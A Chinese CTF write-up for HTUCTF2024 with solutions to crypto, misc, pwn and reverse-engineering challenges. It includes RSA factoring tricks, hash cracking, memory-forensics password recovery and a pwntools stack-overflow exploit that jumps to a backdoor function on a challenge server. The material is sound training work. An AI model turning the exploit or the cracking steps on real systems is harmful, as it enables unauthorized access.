HTUCTF2024 河南師範大學招新賽

Kicky_Mu發表於2024-05-05

CRYPTO

easyMath

題目

中國古代有很多人同名
譬如同樣叫孫子,有的人會兵法,有的人會數學
你能幫我求解出這道題的答案嗎?
請開啟容器後下載對應輸出檔案
難度:簡單

from secret import flag
from Crypto.Util.number import *


def s2n(string):
	return int(string.encode("utf-8").hex(),16)


m = s2n(flag)

n1 = getPrime(256)
n2 = getPrime(256)

c1 = m % n1
c2 = m % n2

with open("./result.txt","w") as file:
	file.write(f"{c1=}\n{c2=}\n{n1=}\n{n2=}")
	file.close()


c1=83689382223866455921972283666041548913707590157650641569649861997774896018775
c2=59781417889496026093316789713307179877847969875945980953377618064246216393966
n1=94819471330207996193824867701549517420931391131653697367385442658040198169087
n2=81518723062141584749826931381471762289036698180799665826428079725669435831939

我的解答:

給了兩組n,c,兩兩互素,中國剩餘定理模板直接打

import gmpy2
import libnum
c1=83689382223866455921972283666041548913707590157650641569649861997774896018775
c2=59781417889496026093316789713307179877847969875945980953377618064246216393966
n1=94819471330207996193824867701549517420931391131653697367385442658040198169087
n2=81518723062141584749826931381471762289036698180799665826428079725669435831939
e = 1
n = [n1, n2]
c = [c1, c2]
N = 1
for i in n:
    N = N * i
m_e = 0
for i in range(len(n)):
    m_e = m_e + c[i] * N // n[i] * gmpy2.invert(N // n[i], n[i])
m_e = m_e % N
m, f = gmpy2.iroot(m_e, e)
flag = libnum.n2s(int(m))
print(flag)
# HTUCTF{6830dfb6-6dad-47c3-9845-cbf8729a39d0}

babyRSA

題目

只有做出了這道題,你才算真正邁入了密碼學的世界
RSA的用途非常廣泛,從SSH到網頁互動,處處存在著RSA的身影
他是一種非對稱加密方式,有兩把鑰匙,我們用一把鑰匙進行加密,對方只能用另一把鑰匙進行解密
我們管這兩把鑰匙叫做公鑰和私鑰
不知你有沒有好奇過,這麼神奇的演算法究竟是怎麼做到的?
在這道題中,我將給你公鑰和私鑰,你能夠把加密的資訊解出來嗎?
題目難度:簡單

from secret import flag
from Crypto.Util.number import *
from gmpy2 import *

def s2n(string):
	return int(string.encode("utf-8").hex(),16)


m = s2n(flag)

p = getPrime(1024)
q = getPrime(1024)
n = p*q
e=0x10001
phi = (p-1)*(q-1)
d=int(invert(e,phi))

c = pow(m,e,n)

with open("./babyRSA.txt","w") as file:
	file.write(f"PublicKey = {(n,e)}\nPrivateKey = {(n,d)}\nSecretMessage = {c}")
	file.close()
PublicKey = (15523080121481037533846720367813834377778668111438874384664871738673652023893681357714286669202218630173688764354403816749912450587255647744945603619550878566130134326797819954512983867052500839161599443844224323267337522399135478058113507907104399219913320985529466978833344052718261054083152011157455045097091641203323851668404438287902103403601573018986296413876255090488772617992957471058548453512371563625245567602182322624846936417836549954739151793975227074948775314087417591594723093093078900110015127568580332294339983560296269696651253323984277447954358921687931219529934624802414560546769410979640248733659, 65537)
PrivateKey = (15523080121481037533846720367813834377778668111438874384664871738673652023893681357714286669202218630173688764354403816749912450587255647744945603619550878566130134326797819954512983867052500839161599443844224323267337522399135478058113507907104399219913320985529466978833344052718261054083152011157455045097091641203323851668404438287902103403601573018986296413876255090488772617992957471058548453512371563625245567602182322624846936417836549954739151793975227074948775314087417591594723093093078900110015127568580332294339983560296269696651253323984277447954358921687931219529934624802414560546769410979640248733659, 10130966979812730784101987023698572165438594877129919513875915803386628078276096541375947471124972080653508946533508705769675989693121420958341293590115967743877780573199816212130999984155050824612355332287183770309757244122492983619964767386402633068863887043854103203055675295220493184082954328413364468756304963614016917597743916465686317910038955387483525262605921266852350229828235038160818884177156053818135328631651154292654654240777442377441948318512112581410714535003804163937871843629160969182930526468352966433926341943406916675978477553950863356810621030844225209745966135746365112354585567779963748595969)
SecretMessage = 8909815489319611747101806090352005136825996914855161761302645282643080552432976736620209215329466289301992429134065407495314041984721445376467363401021503220512909366842774353910947660541614402215323602839266991486292484969950842395065745792919439549479729664538304190570526236917426962327919265077666475322894816082657333664773384861021347407612617932770946226057878531069668485974874093332911603383506567742453209014787426744169318763457638545787910612700001393603668998957766517443362067847142093494532359202010509321223568196703549094729917579540223646141085303490009162322771331375674034776269587055027505487338

我的解答:

給了n,e,d,c直接打

from Crypto.Util.number import *
n=15523080121481037533846720367813834377778668111438874384664871738673652023893681357714286669202218630173688764354403816749912450587255647744945603619550878566130134326797819954512983867052500839161599443844224323267337522399135478058113507907104399219913320985529466978833344052718261054083152011157455045097091641203323851668404438287902103403601573018986296413876255090488772617992957471058548453512371563625245567602182322624846936417836549954739151793975227074948775314087417591594723093093078900110015127568580332294339983560296269696651253323984277447954358921687931219529934624802414560546769410979640248733659
e=65537
c=8909815489319611747101806090352005136825996914855161761302645282643080552432976736620209215329466289301992429134065407495314041984721445376467363401021503220512909366842774353910947660541614402215323602839266991486292484969950842395065745792919439549479729664538304190570526236917426962327919265077666475322894816082657333664773384861021347407612617932770946226057878531069668485974874093332911603383506567742453209014787426744169318763457638545787910612700001393603668998957766517443362067847142093494532359202010509321223568196703549094729917579540223646141085303490009162322771331375674034776269587055027505487338
d=10130966979812730784101987023698572165438594877129919513875915803386628078276096541375947471124972080653508946533508705769675989693121420958341293590115967743877780573199816212130999984155050824612355332287183770309757244122492983619964767386402633068863887043854103203055675295220493184082954328413364468756304963614016917597743916465686317910038955387483525262605921266852350229828235038160818884177156053818135328631651154292654654240777442377441948318512112581410714535003804163937871843629160969182930526468352966433926341943406916675978477553950863356810621030844225209745966135746365112354585567779963748595969

print(long_to_bytes(pow(c,d,n)))
# HTUCTF{ebc4a957-ab76-481c-b6bd-667cc4ac3753}

RSA

題目

乾的漂亮!你現在一定掌握了一定的RSA相關知識了,你現在可能覺得RSA是如此的完美
是的,在理想情況下,2048位的RSA甚至可以用來為銀行提供安全保障
但是萬事皆有例外,在某些情況下,RSA也會變的不那麼安全
那麼,本題就模擬了這樣一種不太安全的RSA,他允許你透過公鑰去計算得到私鑰
在本題中,你需要透過你高中所學的知識與素數相關知識去找到漏洞所在
並計算出私鑰來解開關鍵資料!
題目難度:中等

from secret import flag
from Crypto.Util.number import *
from gmpy2 import *

def s2n(string):
	return int(string.encode("utf-8").hex(),16)


m = s2n(flag)

def gen():
	p = getPrime(1024)
	q = int(next_prime(p))
	n = p*q
	phi = (p-1)*(q-1)
	e=0x10001
	while(gcd(phi,e) != 1):
		p = getPrime(1024)
		q = next_prime(p)
		n = p*q
		phi = (p-1)*(q-1)
	return (n,e,phi)


n,e,phi = gen()
c = pow(m,e,n)

with open("./RSA.txt","w") as file:
	file.write(f"{n=}\n{c=}")
	file.close()

n=21286146193854256777821383042439507781105332290319538512628531084363651251523737327523526945612481957021838676502097885784407117228821536316627194056016486984426091341625957366569549571084440241355428867857837140319691847950217286102843758914496900637376261209537885852057822619662489521115321859242996996458728300402824811649138687472097270381948645979317238405355317018553106347027764063263805658928486133580606644257911929016951909686457495514815344574782826352986788656399212873924655579987522938396847374837850343107582172369858866834252004753149808298622166784424349528065903222286329891172505299710375017996191
c=7921489143329983775649495695329191444017407997719201400647964433213317629336909589895994155506980858710603819714367102048723400232379433082760979014532262440915742640192044614047545849862082848156805064088229776304993545321080324512923192149436096920526568355327960180036643391499502690341050835062928627571479179709775940839058598193047520944765623044970104274162972438155291820907007955749419361799197271532772738133005238318979095274472556402534604449320547273946695463016399927750930765171319755043575142378579721541211811566320576805327333527544884573840360315620734184329550640235605842721184595864846192049833

我的解答:

臨近素數,板子打

from Crypto.Util.number import *
from gmpy2 import *
e = 65537
n=21286146193854256777821383042439507781105332290319538512628531084363651251523737327523526945612481957021838676502097885784407117228821536316627194056016486984426091341625957366569549571084440241355428867857837140319691847950217286102843758914496900637376261209537885852057822619662489521115321859242996996458728300402824811649138687472097270381948645979317238405355317018553106347027764063263805658928486133580606644257911929016951909686457495514815344574782826352986788656399212873924655579987522938396847374837850343107582172369858866834252004753149808298622166784424349528065903222286329891172505299710375017996191
c=7921489143329983775649495695329191444017407997719201400647964433213317629336909589895994155506980858710603819714367102048723400232379433082760979014532262440915742640192044614047545849862082848156805064088229776304993545321080324512923192149436096920526568355327960180036643391499502690341050835062928627571479179709775940839058598193047520944765623044970104274162972438155291820907007955749419361799197271532772738133005238318979095274472556402534604449320547273946695463016399927750930765171319755043575142378579721541211811566320576805327333527544884573840360315620734184329550640235605842721184595864846192049833

sn = gmpy2.isqrt(n)
q = gmpy2.next_prime(sn)
p = n // q
phi = (p-1)*(q-1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
# HTUCTF{0bc91ba1-7847-424f-a5ae-7514c2dae479}

密碼_簽到

題目

你知道凱撒加密嗎?

FRSARD{UCJAMKC_RM_2024_FRSARD!!!}

我的解答:

隨波逐流梭

HTUCTF{WELCOME_TO_2024_HTUCTF!!!}

high_RSA

題目

恭喜你,你已經瞭解了RSA在可能得情況下的危害
但是,正如麻繩專挑細處斷一樣,安全的方方面面都不可或缺
讓我們假設你是一名紅客,手裡擁有一個對方電腦的後門程式,但是這個程式為了不被發現無法申請足夠記憶體
為了獲取對方的資料,你利用這個程式獲得了對方電腦RSA的資料,以便透過SSH連線到對方電腦
這個資料量過於龐大,以至於你只能獲取到一部分資料
你能夠恢復出來完整的資料來成功駭入嗎?
題目難度:難
(其實也沒多難...不要被抽象代數嚇到了,我不會數學≠我不會解題,不等式秒了)

from secret import flag
from Crypto.Util.number import *
from gmpy2 import *

def s2n(string):
	return int(string.encode("utf-8").hex(),16)


m = s2n(flag)

def gen():
	p = getStrongPrime(1024)
	q = getStrongPrime(1024)
	n = p*q
	phi = (p-1)*(q-1)
	e=0x10001
	while(gcd(phi,e) != 1):
		p = getStrongPrime(1024)
		q = getStrongPrime(1024)
		n = p*q
		phi = (p-1)*(q-1)
	return (n,e,phi,p,q)


n,e,phi,p,q = gen()
c = pow(m,e,n)
high_p = (p >> 256) << 256

with open("./highRSA.txt","w") as file:
	file.write(f"{n=}\n{c=}\n{high_p=}")
	file.close()
n=26832066962458662767711134650569516764878390244093044249431717541352809829010026292756085075249493683546901865571162092807642447066717935954820980203362970326424457510243979090947839410021515024546564848003707416178430454370843256632438176839918149251551762655339805650499916986912193271524738666644992154557709230313336222352760741284949409799415476076495429070382400856900167330412449787134931316411702443532096911949687029419857447352146932683073974227601854627297878898195567899861786632327700242864905513181808927779278798543351526860932005535628493103381412084360219740343872835463714854550964908803100739720711
c=5263373082734577567839479586655414623605123502659516848748731798811781440341949806983283726466045084344593071073334658221121562912558383981187865516410285252387584393467585522751249550213224687813899297082806077871733395201872158325739707521228687723161973373291027234390564962358683344756569018948507404252733763898300987607979776946680568688214863909198222484739353033110947869228017720295399019491952331445167542451969127203340175478249933145970770930874714514592875202353852229150430254860073007705757537682021345088127046213891504810736043999063285587400229349628962118127506856508919505894615638568778221088766
high_p=155260268569003012839830552245401347442679649702540687666718397914567736179525136763425429591738078795659488517073327110371579992023376288690407974823049327122522731236534457700781670557633182106779419333443659720534567359356182612444617411150434138985917242359563702694312595606207476750599129603389758898176

我的解答:

經典的p高位洩露

import gmpy2
from Crypto.Util.number import *
e=65537
n=26832066962458662767711134650569516764878390244093044249431717541352809829010026292756085075249493683546901865571162092807642447066717935954820980203362970326424457510243979090947839410021515024546564848003707416178430454370843256632438176839918149251551762655339805650499916986912193271524738666644992154557709230313336222352760741284949409799415476076495429070382400856900167330412449787134931316411702443532096911949687029419857447352146932683073974227601854627297878898195567899861786632327700242864905513181808927779278798543351526860932005535628493103381412084360219740343872835463714854550964908803100739720711
c=5263373082734577567839479586655414623605123502659516848748731798811781440341949806983283726466045084344593071073334658221121562912558383981187865516410285252387584393467585522751249550213224687813899297082806077871733395201872158325739707521228687723161973373291027234390564962358683344756569018948507404252733763898300987607979776946680568688214863909198222484739353033110947869228017720295399019491952331445167542451969127203340175478249933145970770930874714514592875202353852229150430254860073007705757537682021345088127046213891504810736043999063285587400229349628962118127506856508919505894615638568778221088766
high_p=155260268569003012839830552245401347442679649702540687666718397914567736179525136763425429591738078795659488517073327110371579992023376288690407974823049327122522731236534457700781670557633182106779419333443659720534567359356182612444617411150434138985917242359563702694312595606207476750599129603389758898176
R.<x> = PolynomialRing(Zmod(n))
f = high_p + x
x = f.small_roots(X = 2^256,beta = 0.4)
if x:
    p = high_p + int(x[0])
    q = n // p
    d = gmpy2.invert(e,(p-1)*(q-1))
    m = pow(c,d,n)
    print(long_to_bytes(int(m)))
# HTUCTF{bbb7e2c4-5739-4eab-ad45-570c86be20e7}

Attack

題目

對於一種密碼體系,如果我們能夠找到一種方法,使得透過已知的部分內容和對應的被加密的內容,來破解出對應的秘鑰
那麼這種方法就被叫做明文攻擊
那麼在本題中,將會給你一種被類似於凱撒密碼的密碼體系加密後的值
你能夠對他進行攻擊並找出flag嗎?
題目難度:簡單

本題flag頭為htuctf{}

secret is :oxfnhm{51fn0n78-78r2-49k2-e6o6-45386qth8i2q}

我的解答:

維吉尼亞解碼,key是hello(根據flag頭算出來的)

HTUCTF2024 河南師範大學招新賽

奇怪的RSA

題目

這個n怎麼跟之前學的不一樣了
難度:中等偏下

n=9797280722297383274206129366924911238159531646782588235425496441018603521906214822246463461173026436766357301667490255758014545136376215630632913217943693454599607181104457459704890073820815269629927086893622983109900322077682061770037009627858293858079170648986304796239176995439230791482842207808760812707274441718245663482728958202732073615184138431872947691082675226097330289348107538915563758447312783574426116626142170193857288512932028427662766889672667666124977746543158461842707085268112769440167135292097914024183004899521423565999413912896081894668524836680741305072184620592976414632021146993068852321682224774063402386979275754410550658725965565558741379647004611814084223568478000636303177114721095055926493733229126101656421088488149818472808276183648127582974030582322605326949335921761883338261371947420333298835965419945468897218378857695789805996307849895056019137558524547291427992927750239912783691973289027652868009039409101567361743084903654992780865430272335247215413205988182536939011777593246190904789384746466169417549523741915876204210448126866806898004736948795818397941220900188611543001463316268786023800879826714282193478815064580026612881606703097040735229393269388992971022987866655043694603025183226901723140756053762333659842691711475526354396212072576764822816149219166129647066887324015483710351976091899190818277553825384103028795714466631003515086950798032880614154340697278735600240355126104124454472587233763326168718337010496877414696789855658240440976001073107676481646007868257165514512406462907
c=5026294270472341516281967768024823988211520479705550347791737269197144991018432260772869917413931970596323376462942676330952706594203686062230870565305755713397064980008245765280923086185322432350745365676393859410733791638737980029398313605454331200823466184561513332154358260911960012186030476084183825686415220565409492864776416837513373738512522098564292785408992952241100323270440158180673533227197308932835014106694454970006386898536636626965401897549172858412952232900506615210718784844859331905728127508619293848356738221599940095985149564780003406814853991525248042768596039920545745290215481665663646075842598915149383754511745185069733195598186369553443089170842916619037179927876137170091853123369124452414031777068336531175674802393050859481751905561595637672065609328749148665586779113822274605772746671318603508401332234892783270849494429661389179557105978067614723323979133624001944328078576201959628636669711294925830023172880802286460253693491031523534646275507929337557144216000320046044856456105803221553459208055536477727124999642450266747885923500686074656279403605048320346579292324096695911518310045059703013950287439053123110957256092192591738831212887488314280535596199050937975272001815140057838227666534017906857787101647310250002243565024224470944832652926327140423057025650796529363452647655178633472248390631519187741674904685731259241960485176749338780224419187384859336116383909982282465893681707228873285368252148860007084379792234483840610940427165345252500655046498669531835852991292614317980670782795421
e=65537

我的解答:

分解n發現是p的五次方,這種情況下的phi=p**5 - p**4

exp:

import gmpy2
from Crypto.Util.number import *

n=9797280722297383274206129366924911238159531646782588235425496441018603521906214822246463461173026436766357301667490255758014545136376215630632913217943693454599607181104457459704890073820815269629927086893622983109900322077682061770037009627858293858079170648986304796239176995439230791482842207808760812707274441718245663482728958202732073615184138431872947691082675226097330289348107538915563758447312783574426116626142170193857288512932028427662766889672667666124977746543158461842707085268112769440167135292097914024183004899521423565999413912896081894668524836680741305072184620592976414632021146993068852321682224774063402386979275754410550658725965565558741379647004611814084223568478000636303177114721095055926493733229126101656421088488149818472808276183648127582974030582322605326949335921761883338261371947420333298835965419945468897218378857695789805996307849895056019137558524547291427992927750239912783691973289027652868009039409101567361743084903654992780865430272335247215413205988182536939011777593246190904789384746466169417549523741915876204210448126866806898004736948795818397941220900188611543001463316268786023800879826714282193478815064580026612881606703097040735229393269388992971022987866655043694603025183226901723140756053762333659842691711475526354396212072576764822816149219166129647066887324015483710351976091899190818277553825384103028795714466631003515086950798032880614154340697278735600240355126104124454472587233763326168718337010496877414696789855658240440976001073107676481646007868257165514512406462907
c=5026294270472341516281967768024823988211520479705550347791737269197144991018432260772869917413931970596323376462942676330952706594203686062230870565305755713397064980008245765280923086185322432350745365676393859410733791638737980029398313605454331200823466184561513332154358260911960012186030476084183825686415220565409492864776416837513373738512522098564292785408992952241100323270440158180673533227197308932835014106694454970006386898536636626965401897549172858412952232900506615210718784844859331905728127508619293848356738221599940095985149564780003406814853991525248042768596039920545745290215481665663646075842598915149383754511745185069733195598186369553443089170842916619037179927876137170091853123369124452414031777068336531175674802393050859481751905561595637672065609328749148665586779113822274605772746671318603508401332234892783270849494429661389179557105978067614723323979133624001944328078576201959628636669711294925830023172880802286460253693491031523534646275507929337557144216000320046044856456105803221553459208055536477727124999642450266747885923500686074656279403605048320346579292324096695911518310045059703013950287439053123110957256092192591738831212887488314280535596199050937975272001815140057838227666534017906857787101647310250002243565024224470944832652926327140423057025650796529363452647655178633472248390631519187741674904685731259241960485176749338780224419187384859336116383909982282465893681707228873285368252148860007084379792234483840610940427165345252500655046498669531835852991292614317980670782795421
e=65537
p = gmpy2.iroot(n,5)[0]
d = gmpy2.invert(e, p**5-p**4)
m = pow(c, d, n)
print(long_to_bytes(m))
# HTUCTF{7b2ca463-d2d9-47ac-930b-6914c3d00c8a}

baby_equation

題目

描述:簡單的方程組
題目難度:中等

from secret import flag
from Crypto.Util.number import *
from gmpy2 import *

filename = "baby_equation.txt"

def s2n(string):
	return int(string.encode("utf-8").hex(),16)


m = s2n(flag)

e = 65537
p = getPrime(256)
q = getPrime(158)
r = getPrime(126)
n = p*q*r
hint1 = p**2-q**3+r**5
hint2 = p-q**2-r**3
c = pow(m,e,n)
print(f'n = {n}')
print(f'c = {c}')
print(f'hint1 = {hint1}')
print(f'hint2 = {hint2}')

with open(f"./{filename}","w") as file:
	file.write(f"{n=}\n{c=}\n{hint1=}\n{hint2=}")
	file.close()

我的解答:

方程組,三個未知數,三個等式

直接解

import gmpy2
import sympy as sp
from Crypto.Util.number import long_to_bytes

# 定義符號變數p,q
p, q, r = sp.symbols('p q r')

# 定義方程組
n=1714808108641798425751310477167823335955229712489728804761312762037242675123506918099136836072952998053478120207249337855548456594600603091879518033495336649464097
c=1271059887748896825060264613725111099333346917676850000927141530723445751426003464525479424933165773851501797216393819428216922457947718026431628278372802650997905
hint1=873322371665117750002905530165951105343454768307957282438202226511477054275833928519265678069449383868985966127316349093439543595940439424293980757113264748232611064850437734072475831795015
hint2=-231581973880579877071715841045171446682851086334176281592273453765336628759594866687658829710062474739604131003041
eq1 = p**2-q**3+r**5-hint1
eq2 = p-q**2-r**3-hint2
eq3 = p*q*r-n
# 求解方程組
sol = sp.solve((eq1, eq2, eq3), (p, q, r))
print(sol)
# p = 92915895594985626121143662996242137124019722863293916576352995643967780302439
# q = 300531911762485106017266076248013109964445189793
# r = 61409408903806830899572429924195985111

# 解題
n=1714808108641798425751310477167823335955229712489728804761312762037242675123506918099136836072952998053478120207249337855548456594600603091879518033495336649464097
c=1271059887748896825060264613725111099333346917676850000927141530723445751426003464525479424933165773851501797216393819428216922457947718026431628278372802650997905
e = 65537
p = 92915895594985626121143662996242137124019722863293916576352995643967780302439
q = 300531911762485106017266076248013109964445189793
r = 61409408903806830899572429924195985111
d = gmpy2.invert(e, (p - 1) * (q - 1) * (r - 1))
m = pow(c, d, n)
print(long_to_bytes(m))
# HTUCTF{a29fa9c1-ac6b-4381-b173-002549e01c06}

guoql的大冒險

題目

guoql喜歡小兔子,有一天他家養的小兔子被壞人用3層柵欄困住了,聰明的你能幫助guoql解決困難把兔兔釋放出來嗎?

UdX6OtWqCp0KRHsA
z2sGk1DifJ3aqdNZzk4j7Sk73dTpwTI1BkfFV/KaLWB5bTcODXvH

我的解答:

先柵欄解碼再兔子流解碼

HTUCTF2024 河南師範大學招新賽

HTUCTF2024 河南師範大學招新賽

MISC

彩蛋

題目

在這個比賽平臺中有一些選單,你能找到他並恢復出來flag嗎?

不需要對網站進行爆破掃描!

我的解答:

觀察平臺會發現如下資訊:

我想你需要知道:4854554354467b77656c63306d655f325f485455

141,156,144,137,150,141,166,145,137,146,165,156,175

還有一張圖片(試過就知道這張圖其實沒有用)

第一部分:16進位制轉字元: HTUCTF{welc0me_2_HTU

第二部分:八進位制轉字元: and_have_fun}

拼接:HTUCTF{welc0me_2_HTUand_have_fun}

初中數學(計算機版)

題目

弄髒的數字
就如同小明小時候喜歡將墨水潑到紙張上一樣,學了計算機的小明還是沒有改掉這個壞習慣
這下,他又透過奇怪的方式“一不小心”把部分數字給弄髒了(題目中用?表示)
還好老師儲存了md5值
你能幫他恢復資料嗎?
題目難度:簡單

這是他弄髒的flag
HTUCTF{372?7539-0217-1?ef-a234-f8?9d27fc?22}

md5=b9636e79bccbe1cbcdb2f9a7f698742d

我的解答:

典型的MD5爆破

import string
import hashlib
dic1=string.digits+string.ascii_lowercase+string.ascii_uppercase
for i1 in dic1:
	for i2 in dic1:
		for i3 in dic1:
			for i4 in dic1:
				t='HTUCTF{372'+i1+'7539-0217-1'+i2+'ef-a234-f8'+i3+'9d27fc'+i4+'22}'
				md5 = hashlib.md5(t.encode('utf-8')).hexdigest()
				#print t
				if md5[:38] == 'b9636e79bccbe1cbcdb2f9a7f698742d':
					print (t)
# HTUCTF{37277539-0217-11ef-a234-f889d27fcc22}

ez取證

題目

小m在他的電腦裡面存放了一個機密檔案,你能找到這個檔案嗎?
https://www.123pan.com/s/VXmfjv-bPv4H.html
提取碼:A5T4
題目難度:中等

我的解答:

R-Studio掃描映象檔案發現壓縮包:flag.txt.zip

還原出來即可。解壓發現需要密碼。

volatility進行hashdump爆破即可

得到雜湊值 15f952a687d575198c3c5dbd9a1aa89c 後 somd5解碼即可得到密碼:Windows.7

htuCTF{Th1s_1s_e2sy_f0rens1cs!!!}

a1eiqinuo

題目

檢驗原批濃度的時候到了!
ps:得到的flag請套上htuCTF{}提交

我的解答:

解壓得到圖片

HTUCTF2024 河南師範大學招新賽

010檔案尾發現 c3RlZ2hpZGVfcGFzcz1odHVDVEY=

base64解碼:steghide_pass=htuCTF

可知steghide隱寫,嘗試原圖無果。發現裡面藏得壓縮包裡面還有圖片。。。。

HTUCTF2024 河南師範大學招新賽

卡里分離得到壓縮包,純數字八位爆破得到密碼 20240424

HTUCTF2024 河南師範大學招新賽

這個應該才是steghide隱寫,然後可以得到wenzi.jpg

HTUCTF2024 河南師範大學招新賽

一眼丁真 原神字型,對著下面的表找即可。。

HTUCTF2024 河南師範大學招新賽

htuCTF{yuanshenqidong}

music

題目

好聽的音樂中暗藏玄機。
得到的flag請修改為HTUCTF{}
題目難度:簡單

嘗試檢視屬性,裡面可能有提示

我的解答:

屬性裡面發現MP3Stego 還有一個釋出者:111

指令:decode -X -P 111 music.mp3

直接得到:flag{valorant_is_a_good_game}

提交時改下flag頭即可

baseHome-misc簽到

題目

base家族的加密你知道幾個?
難度:簽到

SkJLRktRMlVJWjVXRVlMVE1VM0RJWDNCTlpTRjZZVEJPTlNUR01TN05GWlY2NVRGT0o0VjYyREJPQllIUzdJPQ==

我的解答:

HTUCTF2024 河南師範大學招新賽

echo

題目

感覺不如初音未來

我的解答:

echo.mid音訊檔案,找個線上工具開啟即可 https://app.ampedstudio.com/

然後註冊一個賬號就能用了。

然後匯入MIDI檔案,如下:發現最下層的軌道給了hint,仔細觀察像是電位高低,高位1,低位0,轉一下01即可。

0110100001110100011101010110001101110100011001100111101101100111011101010110110100110001010111110011000101110011010111110011011001101111001101000010000101111101

HTUCTF2024 河南師範大學招新賽

解碼得到:htuctf{gum1_1s_6o4!}

簡單流量分析

題目

小明上傳了一張圖片,這是他產生的流量發生的變化。
題目難度:簡單

我的解答:

根據題目描述,Wireshark流量分析HTTP流發現兩個圖片,分別是jpg和gif(直接搜尋GIF89a

裡面還有個hacker.png但沒什麼用。還是要從jpg和gif入手的。

匯出HTTP全部檔案即可。找最大的那個php檔案,然後賽博廚子開啟檔案。

我們把GIF89a前面那段jpg資訊刪掉就行,然後儲存檔案為gif即可。分離每一幀。

HTUCTF2024 河南師範大學招新賽

發現有些地方有&#xx;類的編碼。提取全部:&#102;&#108;&#97;&#103;&#123;&#83;&#48;&#50;&#50;&#121;&#52;&#111;&#114;&#114;&#53;&#125;

HTML解碼得到:flag{S022y4orr5}

機位查詢

題目

小l和小s去年去了很多地方,拍了很多照片,你能找到這幾張圖片是在哪裡拍的嗎?
ps:這三張圖片的拍攝位置都是標誌性地點,在地圖上均可查。flag為1,2,3張圖片拍攝點的每個字的第一個字母大寫,三個拍攝點之間用_隔開
如:若找到的拍攝地點分別為"洛邑古城""二七廣場""數字大廈",則flag為htuCTF{LYGC_EQGC_SZDS}
題目難度:簡單

HTUCTF2024 河南師範大學招新賽HTUCTF2024 河南師範大學招新賽HTUCTF2024 河南師範大學招新賽

我的解答:

三幅圖:

第一處:

百度地圖找龍門石窟。定位到河對面,然後觀察此圖有樓梯有佛像。按方位來看是偏左一點。可發現是(禮佛臺)百度一下這個地方簡介會出現全名:禮佛觀景臺。此處也是拍照的好方位。

第二處:

百度識圖發現是泰山。問了熟悉泰山的本地朋友知道是十八盤(很出名)。然後對著百度十八盤復現了一下地點 確信!

第三處:

後面是標誌性建築鄭州玉米樓,谷歌查一下就行了,找下方位。不過我還問了鄭州的朋友確認了一下(比較熟悉附近的,丹尼斯那一片區域)直接就看出來是菸草大廈了。

HTUCTF2024 河南師範大學招新賽HTUCTF2024 河南師範大學招新賽

htuCTF{LFGJT_SBP_YCDS}

你好

題目

他說本來想給你點提示的,但是奈何嚶語不好
於是好心的guoql幫忙翻譯成中文了!(掐腰.jpg)
你能知道他想提示你什麼,並獲取flag嗎?
題目難度:簡單

我的解答:

png寬高一把梭發現密碼:maoxian

卡里分離圖片得到壓縮包,解壓壓縮包即可。

HTUCTF{you_can_encrypt_anything_in_anywhere}

PWN

ez_nc_簽到

題目

聽說nc指令很神奇?
題目難度:簽到

我的解答:

nc連線靶機跟著步驟走就行。簽到題沒難度。

環境?環境!

題目

萬事開頭難 不如我們先配置一下Pwn環境吧!
題目難度:簡單

我的解答:

根據txt所說走就行,前提是自己配好環境,然後執行指令碼即可獲得flag

完形填空

題目

什麼?Pwn也可以完形填空?我竟然不用自己寫指令碼!可是這個棧溢位怎麼寫呢?溢位值是多少啊啊啊!!!
題目難度:中等

我的解答:

HTUCTF2024 河南師範大學招新賽

rbp是20轉16進位制也就是前面的buf[32]

簡單跑一下後ls沒效果。看到程式是64位少了8個位元組補充回去即可,也就是padding=32+8=40

from pwn import *

context(log_level='debug',arch='amd64',os='linux')   
ip =''    # 輸入題目給的ip
port=     # 輸入題題目給的埠
p = remote(ip,port)
backdoor=0x401225
padding=40
payload=padding*b'a'+p64(0x401016)+p64(backdoor)
p.sendafter("please input:",payload)
p.interactive()

跑成功後ls看到flag 再cat flag即可。

RE

猜數字_簽到

題目

厭倦了那些難題?那就加點運氣成分,來猜一個0-127內的數字吧,猜對了我就會告訴你flag!你可以使用二分法來嘗試,不過每輪我只會給你5次機會,所以你最後一次猜中的機率是多少呢?靠運氣 or 實力,決定權在你。
題目難度:隨機(取決於想怎麼做)
題目考點:逆向或者運氣

我的解答:

最簡單的逆向沒有之一。

二分法多試幾下就出了。

ez_xor

題目

異或是一種計算機運算操作,具體來說,異或表示了相同為0,不同為1的數學運算
我們用^表示異或,英語中異或為xor
我將給你一個程式,請你利用群中所上傳的IDA逆向工具試圖進行逆向
並找到flag
題目難度:簡單

我的解答:

exp:

def reverse_engineer_flag():
    # 初始化相關資料
    s = "tryw1th"
    v8 = [28, 6, 12, 20, 69, 18, 19]
    v11 = "s1mplex0r"
    v9 = [11, 1, 31, 47, 9, 81, 11, 73, 15]

    # 計算flag
    flag = ""
    for i in range(len(s)):
        flag += chr(v8[i] ^ ord(s[i]))

    for j in range(len(v11)):
        flag += chr(v9[j] ^ ord(v11[j]))

    return flag


if __name__ == "__main__":
    print(f"Flag: {reverse_engineer_flag()}")
# Flag: htuctf{x0r_e4sy}

倒車工程

題目

你最近了解到一家汽車公司,他們正在開發一種全新的自動駕駛系統。你對其中的“倒車工程”(Reverse Engineering)模組十分感興趣,可是在使用時需要輸入密碼,這可怎麼辦呢?公司的員工告訴你:逆向嘛很簡單,把螢幕倒過來就行(你內心吐槽:呃布什戈門,螢幕倒過來是什麼鬼......
題目難度:簡單

# -*- coding: utf-8 -*-
"""
倒車技術,我們是專業的! --2024.4.25 EMT倒車公司開發
"""

import time

# 倒車安全性校驗
def compare_password(input_password):
    numbers = [0x48,0x54,0x55,0x43,0x54,0x46,0x7b,0x57,0x65,0x31,0x63,0x30,0x6d,0x65,0x5f,0x74,0x30,0x5f,0x72,0x33,0x76,0x65,0x72,0x73,0x65,0x5f,0x65,0x6e,0x67,0x31,0x6e,0x65,0x65,0x72,0x31,0x6e,0x67,0x7d]

    hex_password = [ord(char) for char in input_password]

    if hex_password == numbers:
        return True
    else:
        return False

# 倒車主系統
def main():
    password = input("請輸入倒車密碼:")
    if compare_password(password):
        print("密碼正確!歡迎使用倒車系統。")
        print("自動倒車中......")
        time.sleep(5)
        print("倒車完成!請不要忘記你的密碼:{},歡迎下次使用".format(password))
    else:
        print("密碼錯誤!請重試。")

if __name__ == "__main__":
    main()

我的解答:

exp:

